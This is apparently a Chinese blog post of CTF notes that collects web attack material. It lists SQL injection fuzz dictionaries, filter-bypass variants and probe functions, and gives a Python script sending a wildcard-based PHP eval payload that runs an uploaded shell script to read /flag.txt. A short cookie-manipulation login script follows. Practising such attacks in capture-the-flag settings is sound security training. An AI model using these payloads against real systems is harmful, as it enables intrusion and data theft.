SQL注入：#

fuzz字典：#

与bp共同使用。

转义类字典：#

1
'
2
"
3
`
4
\
5
;
6
,
7
(
8
)
9
[
10
]
11
{
12
}
13
+
14
-
15
*
16
/
17
%
18
=
19
<
20
>
21
!
22
^
23
|
24
&
25
#
26
--
27
--
28
/*
29
*/
30
%00
31
%0a

单词字典：#

1
AND
2
OR
3
NOT
4
XOR
5
UNION
6
SELECT
7
INSERT
8
UPDATE
9
DELETE
10
DROP
11
CREATE
12
ALTER
13
WHERE
14
FROM
15
LIMIT
16
ORDER
17
GROUP
18
BY
19
HAVING
20
SLEEP
21
BENCHMARK
22
EXTRACTVALUE
23
UPDATEXML
24
LOAD_FILE
25
INTO
26
OUTFILE

变形测试字典：#

1
sEleCt
2
sel%00ect
3
union/**/select
4
/*!SELECT*/
5
+SELECT+
6
%53%45%4c%45%43%54
7
(select)

检测深层功能限制：#

1
user()
2
database()
3
version()
4
@@version
5
@@datadir
6
char()
7
ascii()
8
substr()
9
substring()
10
count()
11
concat()
12
group_concat()

WEB绕过：#

eval执行命令类的一：#

1
import requests
2

3
url = "url" # 替换为题目URL
4

5
params = {
6
    'cmd': '?><?=`. /???/p?p??????`;'
7
}
8
# POST 上传的文件内容
9

10
files = {
11
    'file': ('shell.sh', '#!/bin/sh\ncat /flag.txt')
12
}
13
#!/bin/sh：调取shell，\n：换行，cat /flag.txt：实际执行命令
14

15

16
response = requests.post(url, params=params, files=files)
17
print(response.text)

WEB的POST：#

1
import requests
2

3
url = "你的url"
4

5
headers = {
6
    "Cookie": 'user="adm;n"'
7
}  //特定头部
8

9
session = requests.Session()
10
response = session.get(url, headers=headers)
11

12
print(f"状态码: {response.status_code}")
13
print(f"响应内容: {response.text}")
14

15
if "login success" in response.text:
16
    print("登录成功！当前 Session Cookie 为:")
17
    print(session.cookies.get_dict())

版权声明：本文由 余林阳 创作，转载请注明出处。

是真是假

脚本积累

SQL注入：#

fuzz字典：#

转义类字典：#

单词字典：#

变形测试字典：#

检测深层功能限制：#

WEB绕过：#

eval执行命令类的一：#

WEB的POST：#

喜欢这篇文章吗？

评论区

目录

是真 是假

脚本积累

SQL注入：#

fuzz字典：#

转义类字典：#

单词字典：#

变形测试字典：#

检测深层功能限制：#

WEB绕过：#

eval执行命令类的一：#

WEB的POST：#

喜欢这篇文章吗？

评论区

目录

是真是假